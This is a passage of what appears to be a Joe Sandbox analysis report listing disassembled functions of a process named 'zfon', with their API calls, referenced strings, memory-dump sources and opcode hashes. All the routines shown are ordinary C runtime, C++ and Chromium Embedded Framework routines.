                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B910FEAE
                                                                                                  • Part of subcall function 00007FF8B9115920: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B911592F
                                                                                                Strings
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B910FD9E
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF8B910FE1C
                                                                                                • :AM:am:PM:pm, xrefs: 00007FF8B910FE68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: calloc$free$Concurrency::cancel_current_task$ExceptionGetdaysGetmonthsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func_lock_localesmallocmemcpystd::bad_alloc::bad_alloc
                                                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 1555941588-35662545
                                                                                                • Opcode ID: 4984866773faa2ba8b097bb784f106a27c12d0944b280fa2bc18804908d0bf42
                                                                                                • Instruction ID: 39552476d9cb8c348b73a9638b3301c3ef7f7767f5ee0e452d468dff41b193f6
                                                                                                • Opcode Fuzzy Hash: 4984866773faa2ba8b097bb784f106a27c12d0944b280fa2bc18804908d0bf42
                                                                                                • Instruction Fuzzy Hash: 0EB1E222B09BC695EB118F29A905AB97BA1FB09BE0F284270DF5D077A5DF3DE445D300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: disable-extensions$disable-gpu$disable-gpu-compositing$disable-gpu-vsync$disable-pdf-extension$disable-surfaces$enable-smooth-scrolling$enable-system-flash
                                                                                                • API String ID: 1576575606-2877818427
                                                                                                • Opcode ID: 24952cdb2a72154fed4a212a990a3a1018c8566a43075a85daee53fbdbeba300
                                                                                                • Instruction ID: 70de231240de9409ff842a8410d0db6e9403d2f51d46514b092283ddf293feb5
                                                                                                • Opcode Fuzzy Hash: 24952cdb2a72154fed4a212a990a3a1018c8566a43075a85daee53fbdbeba300
                                                                                                • Instruction Fuzzy Hash: 8C912822B09A1689FF04FF74DC902AC6771AB85B88F844135DA1E236EDCF39D445C3A5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturnmalloc
                                                                                                • String ID:
                                                                                                • API String ID: 1462992686-0
                                                                                                • Opcode ID: da85e19d1928f2fc23d8437a8b2b23bbeb13877c9a32a0fb184de9c485545f0d
                                                                                                • Instruction ID: 736b6be1bf5834385223905e11bf631e47d71a92c3f0c302accfdfb7f8045fcb
                                                                                                • Opcode Fuzzy Hash: da85e19d1928f2fc23d8437a8b2b23bbeb13877c9a32a0fb184de9c485545f0d
                                                                                                • Instruction Fuzzy Hash: A6B16022609B8185EB96AF15AC4476AB7B1FF49BC0F988034DA5D077E8EF3CD444C3A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameName::$Name::operator+atolswprintf_s
                                                                                                • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                • API String ID: 2331677841-2441609178
                                                                                                • Opcode ID: 67fbf97d81b02749f9509a8c4f2694abdb9786e9786639b69dd16a9e3b2c746f
                                                                                                • Instruction ID: 668441892d68486457135b21961486f1ddca798585c993f4d5e6020fa78d4107
                                                                                                • Opcode Fuzzy Hash: 67fbf97d81b02749f9509a8c4f2694abdb9786e9786639b69dd16a9e3b2c746f
                                                                                                • Instruction Fuzzy Hash: 87F16C22E0C61295FB25ABECD9B51BC27A1BF197C4F580236DB0E26AA5DE3CF545C340
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$memcpy$mallocmemmove
                                                                                                • String ID: eu-cookie-compliance-agreed
                                                                                                • API String ID: 3488293272-1104903451
                                                                                                • Opcode ID: bebb11dbb65a13a40cc3fc36cdb00a75aa414d922c668014217f24f1d0b0e14c
                                                                                                • Instruction ID: 9441633952bfd95cccc8a276321559c3bf72f5f1c218558174fbdef19286ce41
                                                                                                • Opcode Fuzzy Hash: bebb11dbb65a13a40cc3fc36cdb00a75aa414d922c668014217f24f1d0b0e14c
                                                                                                • Instruction Fuzzy Hash: 6A918E22A19B8185E714EF65E8403ADA7B1FB89798F500135EEAE47B9DDF3CD040C7A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addhXp_addxXp_mulhXp_mulx$DscaleStofltStoxfltisspaceisxdigit
                                                                                                • String ID:
                                                                                                • API String ID: 1532609390-0
                                                                                                • Opcode ID: 04dc50dfbf98f029935054b8049ea78db01762cf3d60922a2d415e396d3f7e9b
                                                                                                • Instruction ID: 3ed6a87b60d397f4e214b71bc3e074c63d664ac97631c5b88bd8d2d044f1fd43
                                                                                                • Opcode Fuzzy Hash: 04dc50dfbf98f029935054b8049ea78db01762cf3d60922a2d415e396d3f7e9b
                                                                                                • Instruction Fuzzy Hash: 5D617222F0C9829AEF11DEAED4416FD2721AB54788F504636EF1D67B99DE38E50B8700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulxiswctype$DscaleStofltStoxfltXp_addhXp_mulh
                                                                                                • String ID:
                                                                                                • API String ID: 3318484812-0
                                                                                                • Opcode ID: a768420c2b5fff2fb4244aeac776d75f58bcfee5bf1117b7cc1e02417c62bbbc
                                                                                                • Instruction ID: 3d92fecd46edf2c88b524f2c748682be350678569337f194c04c175535e4ca4a
                                                                                                • Opcode Fuzzy Hash: a768420c2b5fff2fb4244aeac776d75f58bcfee5bf1117b7cc1e02417c62bbbc
                                                                                                • Instruction Fuzzy Hash: 9C61B122F1CE8682EE11DE6DE4805AE6760FB94784F500532EF5E536A9DE3CE94AC700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addhXp_addxXp_mulhXp_mulxiswctype$DscaleStofltStoxflt
                                                                                                • String ID:
                                                                                                • API String ID: 1993114911-0
                                                                                                • Opcode ID: 93daba1b2ca0e0d8915cb4de3bf39f6ce065bf3dbf861f4ba4fb38182f6be529
                                                                                                • Instruction ID: 4795fe0712f1b8d1740dccb9c5057895dfbf88a97185a7c0cf67c53cb2ca43f7
                                                                                                • Opcode Fuzzy Hash: 93daba1b2ca0e0d8915cb4de3bf39f6ce065bf3dbf861f4ba4fb38182f6be529
                                                                                                • Instruction Fuzzy Hash: A5617F22F0C9869AEB11DEAED4806FD3761AB54788F544636DF1D63B95DE3CE90B8300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulx$DscaleStofltStoxfltXp_addhXp_mulhisspaceisxdigit
                                                                                                • String ID:
                                                                                                • API String ID: 1561094175-0
                                                                                                • Opcode ID: 26f20ec9df820aa32de266d0aeb6ef9945677f21c9edbebf0351e67feff02a77
                                                                                                • Instruction ID: 515b5befd5bc9f2ca13445a7fe362f4756e919f877b74aab907b719a9ad64de8
                                                                                                • Opcode Fuzzy Hash: 26f20ec9df820aa32de266d0aeb6ef9945677f21c9edbebf0351e67feff02a77
                                                                                                • Instruction Fuzzy Hash: 1A61C126F1CE8686EF11DE6DE4806BE6721FB84784F500932EF5E17699DE3CE5468B00
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulx$StofltStoxfltXp_addhXp_mulhisspaceisxdigit
                                                                                                • String ID:
                                                                                                • API String ID: 3077680349-0
                                                                                                • Opcode ID: 68dfcd458d3605dce68000bdeb4d798d5053b9c95eebfd4242a2a1a3d2f218f3
                                                                                                • Instruction ID: 5012e2021001e185a33d51438c76e7236deb4cbc30aa8c80e76f82a429ad9699
                                                                                                • Opcode Fuzzy Hash: 68dfcd458d3605dce68000bdeb4d798d5053b9c95eebfd4242a2a1a3d2f218f3
                                                                                                • Instruction Fuzzy Hash: 1461B122F1CE8282EA51DE6DE4805BE7720FB94784F504532EF5E53A89DE3CE54A8B00
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulxiswctype$StofltStoxfltXp_addhXp_mulh
                                                                                                • String ID:
                                                                                                • API String ID: 3654286868-0
                                                                                                • Opcode ID: 56d0606d6971f6acfb222be0b758f0c72f6c494c9e9316963bc2f0e9e72bf29e
                                                                                                • Instruction ID: bdf15e8ff0cbb8099ec233c3335d477d5ffb1e733cb38053f4b967995bb77b4c
                                                                                                • Opcode Fuzzy Hash: 56d0606d6971f6acfb222be0b758f0c72f6c494c9e9316963bc2f0e9e72bf29e
                                                                                                • Instruction Fuzzy Hash: 64618F22F1CE8282EB51DE6DE4806AEB720FB95784F514532EF5E13795DE3CD54A8B00
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID:
                                                                                                • API String ID: 2943138195-0
                                                                                                • Opcode ID: 214de0f7f58aac0764383bd34bc169b25bbdf3ac85b5305c3b37a2798d5e2b6f
                                                                                                • Instruction ID: 8508fe617a32497465544f251389552a53595c94fd00d0a39ae46f76c54b5a89
                                                                                                • Opcode Fuzzy Hash: 214de0f7f58aac0764383bd34bc169b25bbdf3ac85b5305c3b37a2798d5e2b6f
                                                                                                • Instruction Fuzzy Hash: 0FF13876B08A869EF711DFA8E4A01FC37A1AB0478CB448436EB4D57A99DF3CE519C340
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 511923668-4289949731
                                                                                                • Opcode ID: a03a9e90f11697dc1fe6c9e6f472531f76fb679d3088bb41c89f670e4d9fa8ce
                                                                                                • Instruction ID: 83379ecc1728aede37d8775b987d642aaa95c40b022caf21fdd7aa857a5d882a
                                                                                                • Opcode Fuzzy Hash: a03a9e90f11697dc1fe6c9e6f472531f76fb679d3088bb41c89f670e4d9fa8ce
                                                                                                • Instruction Fuzzy Hash: 6C419221A08B4281EB18FF15A94427CA272EB54BE4FD40535C63E077DDDF2EE49183A6
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xbad_alloc@std@@memcpy
                                                                                                • String ID: scene
                                                                                                • API String ID: 1435337725-3648647130
                                                                                                • Opcode ID: a646100d8f9e4bff7fec30077bbb3d5b881434a8c068ff93666efa5abf00f7d9
                                                                                                • Instruction ID: a865bb4a33a96f701258b7eeff62af35d2c7a98c5e5028f23047fd7b4640dbdb
                                                                                                • Opcode Fuzzy Hash: a646100d8f9e4bff7fec30077bbb3d5b881434a8c068ff93666efa5abf00f7d9
                                                                                                • Instruction Fuzzy Hash: 38417361A0975650FB18BF15A808338A2B3EB44BF8FD40634DA3D066DCDF7DA49182F6
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FD76
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FD93
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FDC9
                                                                                                • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FDF4
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE11
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE3A
